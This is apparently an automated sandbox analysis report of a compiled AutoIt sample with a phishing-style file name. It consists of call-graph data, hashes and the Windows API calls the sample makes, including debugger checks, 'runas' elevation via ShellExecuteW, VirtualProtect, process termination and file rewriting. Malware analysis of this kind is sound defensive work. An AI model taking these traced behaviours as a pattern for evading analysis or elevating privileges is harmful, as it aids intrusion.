111802->111804 111805 43d21e 111803->111805 111909 403ed0 111804->111909 111807 403ed0 59 API calls 111805->111807 111809 43d22d 111807->111809 111815 408047 59 API calls 111809->111815 111811 403887 111811->111785 111812 403891 111811->111812 111813 422efd _W_store_winword 60 API calls 111812->111813 111814 40389c 111813->111814 111814->111791 111816 4038a6 111814->111816 111817 43d24f 111815->111817 111818 422efd _W_store_winword 60 API calls 111816->111818 111819 403ed0 59 API calls 111817->111819 111820 4038b1 111818->111820 111821 43d25c 111819->111821 111820->111795 111822 4038bb 111820->111822 111821->111821 111823 422efd _W_store_winword 60 API calls 111822->111823 111824 4038c6 111823->111824 111824->111809 111825 403907 111824->111825 111827 403ed0 59 API calls 111824->111827 111825->111809 111826 403914 111825->111826 111925 4092ce 111826->111925 111829 4038ea 111827->111829 111831 408047 59 API calls 111829->111831 111833 4038f8 111831->111833 111834 403ed0 59 API calls 111833->111834 111834->111825 111837 40928a 59 API calls 111839 40394f 111837->111839 111838 408ee0 60 API calls 111838->111839 111839->111837 111839->111838 111840 403ed0 59 API calls 111839->111840 111841 403995 Mailbox 111839->111841 111840->111839 111841->111711 111843 407292 __write_nolock 111842->111843 111844 4072ab 111843->111844 111846 43ea22 _memset 111843->111846 111999 404750 111844->111999 111848 43ea3e GetOpenFileNameW 111846->111848 111850 43ea8d 111848->111850 111852 407bcc 59 API calls 111850->111852 111854 43eaa2 111852->111854 111854->111854 111855 4072c9 112027 40686a 111855->112027 111883->111721 111893 403d3e __write_nolock 111892->111893 111894 407bcc 59 API calls 111893->111894 111899 403ea4 Mailbox 111893->111899 111896 403d70 111894->111896 111895 4079f2 59 API calls 111895->111896 111896->111895 111905 403da6 Mailbox 111896->111905 111897 4079f2 59 API calls 111897->111905 111898 403e77 111898->111899 111900 407de1 59 API calls 111898->111900 111899->111765 111902 403e98 111900->111902 111901 407de1 59 API calls 111901->111905 111903 403f74 59 API calls 111902->111903 111903->111899 111905->111897 111905->111898 111905->111899 111905->111901 111980 403f74 111905->111980 111907 420db6 Mailbox 59 API calls 111906->111907 111908 4037fb 111907->111908 111908->111786 111910 403ef3 111909->111910 111911 403eda 111909->111911 111913 407bcc 59 API calls 111910->111913 111912 408047 59 API calls 111911->111912 111914 403879 111912->111914 111913->111914 111915 422efd 111914->111915 111916 422f09 111915->111916 111917 422f7e 111915->111917 111923 422f2e 111916->111923 111986 428b28 58 API calls __getptd_noexit 111916->111986 111988 422f90 60 API calls 3 library calls 111917->111988 111920 422f8b 111920->111811 111921 422f15 111987 428db6 9 API calls __woutput_l 111921->111987 111923->111811 111924 422f20 111924->111811 111926 4092d6 111925->111926 111927 420db6 Mailbox 59 API calls 111926->111927 111928 4092e4 111927->111928 111929 403924 111928->111929 111989 4091fc 59 API calls Mailbox 111928->111989 111931 409050 111929->111931 111990 409160 111931->111990 111933 40905f 111934 420db6 Mailbox 59 API calls 111933->111934 111935 403932 111933->111935 111934->111935 111936 408ee0 111935->111936 111937 43f17c 111936->111937 111943 408ef7 111936->111943 111937->111943 111998 408bdb 59 API calls Mailbox 111937->111998 111939 408fff 111939->111839 111940 409040 111944 409d3c 60 API calls 111940->111944 111941 408ff8 111942 420db6 Mailbox 59 API calls 111941->111942 111942->111939 111943->111939 111943->111940 111943->111941 111944->111939 111946 404ee5 85 API calls 111945->111946 111947 4695ca 111946->111947 111948 469734 96 API calls 111947->111948 111949 4695dc 111948->111949 111950 404f0b 74 API calls 111949->111950 111976 43d186 111949->111976 111951 4695f7 111950->111951 111952 404f0b 74 API calls 111951->111952 111953 469607 111952->111953 111954 404f0b 74 API calls 111953->111954 111955 469622 111954->111955 111956 404f0b 74 API calls 111955->111956 111957 46963d 111956->111957 111958 404ee5 85 API calls 111957->111958 111959 469654 111958->111959 111960 42571c __crtCompareStringA_stat 58 API calls 111959->111960 111961 46965b 111960->111961 111962 42571c __crtCompareStringA_stat 58 API calls 111961->111962 111963 469665 111962->111963 111964 404f0b 74 API calls 111963->111964 111965 469679 111964->111965 111966 469109 GetSystemTimeAsFileTime 111965->111966 111967 46968c 111966->111967 111968 4696b6 111967->111968 111969 4696a1 111967->111969 111971 4696bc 111968->111971 111972 46971b 111968->111972 111970 422d55 _free 58 API calls 111969->111970 111974 4696a7 111970->111974 111975 468b06 116 API calls 111971->111975 111973 422d55 _free 58 API calls 111972->111973 111973->111976 111977 422d55 _free 58 API calls 111974->111977 111978 469713 111975->111978 111976->111776 111976->111778 111977->111976 111979 422d55 _free 58 API calls 111978->111979 111979->111976 111982 403f82 111980->111982 111985 403fa4 _memmove 111980->111985 111981 420db6 Mailbox 59 API calls 111983 403fb8 111981->111983 111984 420db6 Mailbox 59 API calls 111982->111984 111983->111905 111984->111985 111985->111981 111986->111921 111987->111924 111988->111920 111989->111929 111991 409169 Mailbox 111990->111991 111992 43f19f 111991->111992 111997 409173 111991->111997 111993 420db6 Mailbox 59 API calls 111992->111993 111995 43f1ab 111993->111995 111994 40917a 111994->111933 111996 409c90 Mailbox 59 API calls 111996->111997 111997->111994 111997->111996 111998->111943 112061 431940 111999->112061 112002 404799 112005 407d8c 59 API calls 112002->112005 112003 40477c 112004 407bcc 59 API calls 112003->112004 112006 404788 112004->112006 112005->112006 112063 407726 112006->112063 112009 420791 112010 431940 __write_nolock 112009->112010 112011 42079e GetLongPathNameW 112010->112011 112012 407bcc 59 API calls 112011->112012 112013 4072bd 112012->112013 112014 40700b 112013->112014 112015 407667 59 API calls 112014->112015 112016 40701d 112015->112016 112017 404750 60 API calls 112016->112017 112018 407028 112017->112018 112019 407033 112018->112019 112025 43e885 112018->112025 112021 403f74 59 API calls 112019->112021 112022 40703f 112021->112022 112067 4034c2 112022->112067 112024 43e89f 112025->112024 112073 407908 61 API calls 112025->112073 112026 407052 Mailbox 112026->111855 112028 404ddd 136 API calls 112027->112028 112029 40688f 112028->112029 112030 43e031 112029->112030 112031 404ddd 136 API calls 112029->112031 112032 46955b 122 API calls 112030->112032 112033 4068a3 112031->112033 112034 43e046 112032->112034 112033->112030 112037 4068ab 112033->112037 112035 43e067 112034->112035 112036 43e04a 112034->112036 112039 420db6 Mailbox 59 API calls 112035->112039 112038 404e4a 84 API calls 112036->112038 112040 43e052 112037->112040 112041 4068b7 112037->112041 112038->112040 112060 43e0ac Mailbox 112039->112060 112173 4642f8 90 API calls _wprintf 112040->112173 112074 406a8c 112041->112074 112044 43e060 112044->112035 112046 43e260 112047 422d55 _free 58 API calls 112046->112047 112048 43e268 112047->112048 112049 404e4a 84 API calls 112048->112049 112054 43e271 112049->112054 112050 40750f 59 API calls 112050->112060 112053 422d55 _free 58 API calls 112053->112054 112054->112053 112056 404e4a 84 API calls 112054->112056 112177 45f7a1 89 API calls 4 library calls 112054->112177 112056->112054 112057 407de1 59 API calls 112057->112060 112060->112046 112060->112050 112060->112054 112060->112057 112167 40735d 112060->112167 112174 45f73d 59 API calls 2 library calls 112060->112174 112175 45f65e 61 API calls 2 library calls 112060->112175 112176 46737f 59 API calls Mailbox 112060->112176 112062 40475d GetFullPathNameW 112061->112062 112062->112002 112062->112003 112064 407734 112063->112064 112065 407d2c 59 API calls 112064->112065 112066 404794 112065->112066 112066->112009 112068 4034d4 112067->112068 112072 4034f3 _memmove 112067->112072 112070 420db6 Mailbox 59 API calls 112068->112070 112069 420db6 Mailbox 59 API calls 112071 40350a 112069->112071 112070->112072 112071->112026 112072->112069 112073->112025 112075 406ab5 112074->112075 112076 43e41e 112074->112076 112183 4057a6 60 API calls Mailbox 112075->112183 112199 45f7a1 89 API calls 4 library calls 112076->112199 112079 406ad7 112184 4057f6 67 API calls 112079->112184 112080 43e431 112200 45f7a1 89 API calls 4 library calls 112080->112200 112082 406aec 112082->112080 112083 406af4 112082->112083 112085 407667 59 API calls 112083->112085 112086 43e44d 112089 406b61 112086->112089 112091 43e460 112089->112091 112092 406b6f 112089->112092 112168 407370 112167->112168 112171 40741e 112167->112171 112169 420db6 Mailbox 59 API calls 112168->112169 112172 4073a2 112168->112172 112169->112172 112170 420db6 59 API calls Mailbox 112170->112172 112171->112060 112172->112170 112172->112171 112173->112044 112174->112060 112175->112060 112176->112060 112177->112054 112183->112079 112184->112082 112199->112080 112200->112086 112227 401055 112232 402649 112227->112232 112230 422d40 __cinit 67 API calls 112231 401064 112230->112231 112233 407667 59 API calls 112232->112233 112234 4026b7 112233->112234 112239 403582 112234->112239 112237 402754 112238 40105a 112237->112238 112242 403416 59 API calls 2 library calls 112237->112242 112238->112230 112243 4035b0 112239->112243 112242->112237 112244 4035bd 112243->112244 112245 4035a1 112243->112245 112244->112245 112246 4035c4 RegOpenKeyExW 112244->112246 112245->112237 112246->112245 112247 4035de RegQueryValueExW 112246->112247 112248 403614 RegCloseKey 112247->112248 112249 4035ff 112247->112249 112248->112245 112249->112248 112250 401016 112255 404974 112250->112255 112253 422d40 __cinit 67 API calls 112254 401025 112253->112254 112256 420db6 Mailbox 59 API calls 112255->112256 112257 40497c 112256->112257 112258 40101b 112257->112258 112262 404936 112257->112262 112258->112253 112263 404951 112262->112263 112264 40493f 112262->112264 112266 4049a0 112263->112266 112265 422d40 __cinit 67 API calls 112264->112265 112265->112263 112267 407667 59 API calls 112266->112267 112268 4049b8 GetVersionExW 112267->112268 112269 407bcc 59 API calls 112268->112269 112270 4049fb 112269->112270 112271 407d2c 59 API calls 112270->112271 112280 404a28 112270->112280 112272 404a1c 112271->112272 112273 407726 59 API calls 112272->112273 112273->112280 112274 404a93 GetCurrentProcess IsWow64Process 112275 404aac 112274->112275 112277 404ac2 112275->112277 112278 404b2b GetSystemInfo 112275->112278 112276 43d864 112290 404b37 112277->112290 112279 404af8 112278->112279 112279->112258 112280->112274 112280->112276 112283 404ad4 112286 404b37 2 API calls 112283->112286 112284 404b1f GetSystemInfo 112285 404ae9 112284->112285 112285->112279 112288 404aef FreeLibrary 112285->112288 112287 404adc GetNativeSystemInfo 112286->112287 112287->112285 112288->112279 112291 404ad0 112290->112291 112292 404b40 LoadLibraryA 112290->112292 112291->112283 112291->112284 112292->112291 112293 404b51 GetProcAddress 112292->112293 112293->112291 112294 b797e0 112302 b78e26 112294->112302 112308 b784ad 112294->112308 112296 b798be GetFileSize 112296->112302 112297 b78470 112299 b7851e 112297->112299 112300 b75d20 2 API calls 112297->112300 112301 b78481 112300->112301 112302->112294 112302->112296 112302->112297 112303 b7987f ReadFile 112302->112303 112304 b79a1f 112302->112304 112307 b789b0 112302->112307 112302->112308 112309 b7b180 112302->112309 112322 b75f10 112302->112322 112303->112302 112306 b79a29 SetFilePointerEx 112304->112306 112304->112308 112305 b75d20 2 API calls 112305->112307 112307->112305 112307->112308 112318 b7b0de 112309->112318 112310 b7b2a7 SetFilePointerEx 112311 b7b1df 112310->112311 112314 b7b1c6 112310->112314 112311->112302 112312 b7b196 112313 b7b3a6 112312->112313 112312->112314 112315 b7b3b2 112313->112315 112316 b7b328 SetFilePointerEx 112313->112316 112314->112311 112317 b7b2e0 WriteFile 112314->112317 112315->112302 112316->112302 112317->112302 112318->112309 112318->112310 112318->112312 112318->112316 112319 b7b0d0 SetFilePointerEx 112318->112319 112320 b7b253 112318->112320 112319->112318 112321 b7b054 112319->112321 112320->112302 112321->112302 112324 b75f13 112322->112324 112323 b76084 SetFilePointerEx 112323->112324 112324->112322 112324->112323 112325 b75d90 112324->112325 112325->112302 112326 401078 112331 40708b 112326->112331 112328 40108c 112329 422d40 __cinit 67 API calls 112328->112329 112330 401096 112329->112330 112332 40709b __write_nolock 112331->112332 112333 407667 59 API calls 112332->112333 112334 407151 112333->112334 112335 404706 61 API calls 112334->112335 112336 40715a 112335->112336 112362 42050b 112336->112362 112339 407cab 59 API calls 112340 407173 112339->112340 112341 403f74 59 API calls 112340->112341 112342 407182 112341->112342 112343 407667 59 API calls 112342->112343 112344 40718b 112343->112344 112345 407d8c 59 API calls 112344->112345 112346 407194 RegOpenKeyExW 112345->112346 112347 43e8b1 RegQueryValueExW 112346->112347 112352 4071b6 Mailbox 112346->112352 112348 43e943 RegCloseKey 112347->112348 112349 43e8ce 112347->112349 112348->112352 112355 43e955 _wcscat Mailbox __wsetenvp 112348->112355 112350 420db6 Mailbox 59 API calls 112349->112350 112351 43e8e7 112350->112351 112354 40522e 59 API calls 112351->112354 112352->112328 112353 4079f2 59 API calls 112353->112355 112356 43e8f2 RegQueryValueExW 112354->112356 112355->112352 112355->112353 112360 407de1 59 API calls 112355->112360 112361 403f74 59 API calls 112355->112361 112357 43e929 112356->112357 112358 43e90f 112356->112358 112357->112348 112359 407bcc 59 API calls 112358->112359 112359->112357 112360->112355 112361->112355 112363 431940 __write_nolock 112362->112363 112364 420518 GetFullPathNameW 112363->112364 112365 42053a 112364->112365 112366 407bcc 59 API calls 112365->112366 112367 407165 112366->112367 112367->112339 112368 e80730 112369 e7e380 GetPEB 112368->112369 112370 e80818 112369->112370 112382 e80620 112370->112382 112383 e80629 Sleep 112382->112383 112384 e80637 112383->112384 112385 43fdfc 112391 40ab30 Mailbox _memmove 112385->112391 112387 45617e Mailbox 59 API calls 112412 40a057 112387->112412 112388 409c90 Mailbox 59 API calls 112388->112391 112389 40b525 112501 469e4a 89 API calls 4 library calls 112389->112501 112391->112388 112391->112389 112410 407de1 59 API calls 112391->112410 112391->112412 112414 409f37 Mailbox 112391->112414 112416 47bc6b 331 API calls 112391->112416 112418 40b2b6 112391->112418 112419 409ea0 331 API calls 112391->112419 112421 44086a 112391->112421 112423 440878 112391->112423 112425 44085c 112391->112425 112426 40b21c 112391->112426 112428 420db6 59 API calls Mailbox 112391->112428 112431 456e8f 59 API calls 112391->112431 112435 47445a 331 API calls 112391->112435 112436 47df23 112391->112436 112439 47df37 112391->112439 112442 48241e 112391->112442 112455 47c2e0 112391->112455 112487 467956 112391->112487 112493 45617e 112391->112493 112499 47c193 85 API calls 2 library calls 112391->112499 112393 4409e5 112505 469e4a 89 API calls 4 library calls 112393->112505 112394 440055 112500 469e4a 89 API calls 4 library calls 112394->112500 112396 40b475 112401 408047 59 API calls 112396->112401 112399 420db6 59 API calls Mailbox 112399->112414 112400 440064 112401->112412 112403 40b47a 112403->112393 112403->112394 112406 408047 59 API calls 112406->112414 112407 407667 59 API calls 112407->112414 112408 456e8f 59 API calls 112408->112414 112409 422d40 67 API calls __cinit 112409->112414 112410->112391 112411 4409d6 112504 469e4a 89 API calls 4 library calls 112411->112504 112414->112394 112414->112396 112414->112399 112414->112403 112414->112406 112414->112407 112414->112408 112414->112409 112414->112411 112414->112412 112415 40a55a 112414->112415 112496 40c8c0 331 API calls 2 library calls 112414->112496 112497 40b900 60 API calls Mailbox 112414->112497 112503 469e4a 89 API calls 4 library calls 112415->112503 112416->112391 112498 40f6a3 331 API calls 112418->112498 112419->112391 112422 409c90 Mailbox 59 API calls 112421->112422 112422->112425 112502 469e4a 89 API calls 4 library calls 112423->112502 112425->112387 112425->112412 112427 409d3c 60 API calls 112426->112427 112429 40b22d 112427->112429 112428->112391 112430 409d3c 60 API calls 112429->112430 112430->112418 112431->112391 112435->112391 112506 47cadd 112436->112506 112438 47df33 112438->112391 112440 47cadd 130 API calls 112439->112440 112441 47df47 112440->112441 112441->112391 112443 409837 84 API calls 112442->112443 112444 482436 112443->112444 112445 407667 59 API calls 112444->112445 112446 482444 112445->112446 112447 409b3c 59 API calls 112446->112447 112449 48244f 112447->112449 112448 482479 112595 409a3c 59 API calls Mailbox 112448->112595 112449->112448 112451 409837 84 API calls 112449->112451 112453 48246a 112451->112453 112452 482485 Mailbox 112452->112391 112454 40784b 59 API calls 112453->112454 112454->112448 112456 407667 59 API calls 112455->112456 112457 47c2f4 112456->112457 112458 407667 59 API calls 112457->112458 112459 47c2fc 112458->112459 112460 407667 59 API calls 112459->112460 112461 47c304 112460->112461 112462 409837 84 API calls 112461->112462 112464 47c312 112462->112464 112463 407bcc 59 API calls 112463->112464 112464->112463 112465 47c528 Mailbox 112464->112465 112467 47c4e2 112464->112467 112468 47c4fd 112464->112468 112469 408047 59 API calls 112464->112469 112472 407924 59 API calls 112464->112472 112474 407e4f 59 API calls 112464->112474 112478 407e4f 59 API calls 112464->112478 112480 47c4fb 112464->112480 112484 407cab 59 API calls 112464->112484 112485 409837 84 API calls 112464->112485 112486 407b2e 59 API calls 112464->112486 112465->112391 112470 407cab 59 API calls 112467->112470 112473 407cab 59 API calls 112468->112473 112469->112464 112471 47c4ef 112470->112471 112475 407b2e 59 API calls 112471->112475 112472->112464 112476 47c50c 112473->112476 112479 47c3a9 CharUpperBuffW 112474->112479 112475->112480 112477 407b2e 59 API calls 112476->112477 112477->112480 112481 47c469 CharUpperBuffW 112478->112481 112596 40843a 68 API calls 112479->112596 112480->112465 112598 409a3c 59 API calls Mailbox 112480->112598 112597 40c5a7 69 API calls 2 library calls 112481->112597 112484->112464 112485->112464 112486->112464 112488 467962 112487->112488 112489 420db6 Mailbox 59 API calls 112488->112489 112490 467970 112489->112490 112491 407667 59 API calls 112490->112491 112492 46797e 112490->112492 112491->112492 112492->112391 112599 4560c0 112493->112599 112495 45618c 112495->112391 112496->112414 112497->112414 112498->112389 112499->112391 112500->112400 112501->112425 112502->112425 112503->112412 112504->112393 112505->112412 112507 409837 84 API calls 112506->112507 112508 47cb1a 112507->112508 112529 47cb61 Mailbox 112508->112529 112544 47d7a5 112508->112544 112510 47cf2e 112582 47d8c8 92 API calls Mailbox 112510->112582 112513 47cf3d 112514 47cdc7 112513->112514 112516 47cf49 112513->112516 112557 47c96e 112514->112557 112515 409837 84 API calls 112522 47cbb2 Mailbox 112515->112522 112516->112529 112521 47ce00 112572 420c08 112521->112572 112522->112515 112522->112529 112531 47cdb9 112522->112531 112576 47fbce 59 API calls 2 library calls 112522->112576 112577 47cfdf 61 API calls 2 library calls 112522->112577 112525 47ce33 112528 4092ce 59 API calls 112525->112528 112526 47ce1a 112578 469e4a 89 API calls 4 library calls 112526->112578 112532 47ce3f 112528->112532 112529->112438 112530 47ce25 GetCurrentProcess TerminateProcess 112530->112525 112531->112510 112531->112514 112533 409050 59 API calls 112532->112533 112534 47ce55 112533->112534 112542 47ce7c 112534->112542 112579 408d40 59 API calls Mailbox 112534->112579 112536 47cfa4 112536->112529 112540 47cfb8 FreeLibrary 112536->112540 112537 47ce6b 112580 47d649 107 API calls _free 112537->112580 112540->112529 112542->112536 112543 409d3c 60 API calls 112542->112543 112581 408d40 59 API calls Mailbox 112542->112581 112583 47d649 107 API calls _free 112542->112583 112543->112542 112545 407e4f 59 API calls 112544->112545 112546 47d7c0 CharLowerBuffW 112545->112546 112584 45f167 112546->112584 112549 47d81c Mailbox 112556 47d858 Mailbox 112549->112556 112591 47cfdf 61 API calls 2 library calls 112549->112591 112551 407667 59 API calls 112552 47d7f9 112551->112552 112553 40784b 59 API calls 112552->112553 112554 47d810 112553->112554 112555 407d2c 59 API calls 112554->112555 112555->112549 112556->112522 112558 47c9de 112557->112558 112559 47c989 112557->112559 112563 47da50 112558->112563 112560 420db6 Mailbox 59 API calls 112559->112560 112562 47c9ab 112560->112562 112561 420db6 Mailbox 59 API calls 112561->112562 112562->112558 112562->112561 112564 47dc79 Mailbox 112563->112564 112569 47da73 _strcat _wcscpy __wsetenvp 112563->112569 112564->112521 112565 409b3c 59 API calls 112565->112569 112566 409be6 59 API calls 112566->112569 112567 409b98 59 API calls 112567->112569 112568 409837 84 API calls 112568->112569 112569->112564 112569->112565 112569->112566 112569->112567 112569->112568 112570 42571c 58 API calls __crtCompareStringA_stat 112569->112570 112594 465887 61 API calls 2 library calls 112569->112594 112570->112569 112575 420c1d 112572->112575 112573 420cb5 VirtualProtect 112574 420c83 112573->112574 112574->112525 112574->112526 112575->112573 112575->112574 112576->112522 112577->112522 112578->112530 112579->112537 112580->112542 112581->112542 112582->112513 112583->112542 112586 45f192 __wsetenvp 112584->112586 112585 45f1d1 112585->112549 112585->112551 112586->112585 112588 45f1c7 112586->112588 112589 45f278 112586->112589 112588->112585 112592 4078c4 61 API calls 112588->112592 112589->112585 112593 4078c4 61 API calls 112589->112593 112591->112556 112592->112588 112593->112589 112594->112569 112595->112452 112596->112464 112597->112464 112598->112465 112600 4560e8 112599->112600 112601 4560cb 112599->112601 112600->112495 112601->112600 112603 4560ab 59 API calls Mailbox 112601->112603 112603->112601
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d$w
                                                                                • API String ID: 0-2400632791
                                                                                • Opcode ID: 8b4687f9f1373dd07e815718e9bc9babd62ff994d8e095e0c3d8804ad2cc4433
                                                                                • Instruction ID: 006a62e42fbee10fdf3c16105e080b9ef04ab205eab6a3a63a8a1c6ad40bb1e9
                                                                                • Opcode Fuzzy Hash: 8b4687f9f1373dd07e815718e9bc9babd62ff994d8e095e0c3d8804ad2cc4433
                                                                                • Instruction Fuzzy Hash: 87C17321A0C380ABDE355B289C5AF763FE4EB627A0F8D05F6F549960F3D7249C04D622

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                  • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                  • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                  • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                  • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                  • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                  • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                  • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                  • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                  • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                  • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                  • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                  • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                  • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                  • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                • API String ID: 529118366-2806069697
                                                                                • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2088 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2093 404a06 2088->2093 2094 404b0b-404b0d 2088->2094 2096 404a09-404a0e 2093->2096 2095 43d767-43d773 2094->2095 2097 43d774-43d778 2095->2097 2098 404b12-404b13 2096->2098 2099 404a14 2096->2099 2101 43d77b-43d787 2097->2101 2102 43d77a 2097->2102 2100 404a15-404a4c call 407d2c call 407726 2098->2100 2099->2100 2110 404a52-404a53 2100->2110 2111 43d864-43d867 2100->2111 2101->2097 2104 43d789-43d78e 2101->2104 2102->2101 2104->2096 2106 43d794-43d79b 2104->2106 2106->2095 2108 43d79d 2106->2108 2112 43d7a2-43d7a5 2108->2112 2110->2112 2113 404a59-404a64 2110->2113 2114 43d880-43d884 2111->2114 2115 43d869 2111->2115 2116 404a93-404aaa GetCurrentProcess IsWow64Process 2112->2116 2117 43d7ab-43d7c9 2112->2117 2118 43d7ea-43d7f0 2113->2118 2119 404a6a-404a6c 2113->2119 2122 43d886-43d88f 2114->2122 2123 43d86f-43d878 2114->2123 2120 43d86c 2115->2120 2124 404aac 2116->2124 2125 404aaf-404ac0 2116->2125 2117->2116 2121 43d7cf-43d7d5 2117->2121 2130 43d7f2-43d7f5 2118->2130 2131 43d7fa-43d800 2118->2131 2126 404a72-404a75 2119->2126 2127 43d805-43d811 2119->2127 2120->2123 2128 43d7d7-43d7da 2121->2128 2129 43d7df-43d7e5 2121->2129 2122->2120 2132 43d891-43d894 2122->2132 2123->2114 2124->2125 2133 404ac2-404ad2 call 404b37 2125->2133 2134 404b2b-404b35 GetSystemInfo 2125->2134 2135 43d831-43d834 2126->2135 2136 404a7b-404a8a 2126->2136 2138 43d813-43d816 2127->2138 2139 43d81b-43d821 2127->2139 2128->2116 2129->2116 2130->2116 2131->2116 2132->2123 2147 404ad4-404ae1 call 404b37 2133->2147 2148 404b1f-404b29 GetSystemInfo 2133->2148 2137 404af8-404b08 2134->2137 2135->2116 2144 43d83a-43d84f 2135->2144 2141 404a90 2136->2141 2142 43d826-43d82c 2136->2142 2138->2116 2139->2116 2141->2116 2142->2116 2145 43d851-43d854 2144->2145 2146 43d859-43d85f 2144->2146 2145->2116 2146->2116 2153 404ae3-404ae7 GetNativeSystemInfo 2147->2153 2154 404b18-404b1d 2147->2154 2149 404ae9-404aed 2148->2149 2149->2137 2152 404aef-404af2 FreeLibrary 2149->2152 2152->2137 2153->2149 2154->2153
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
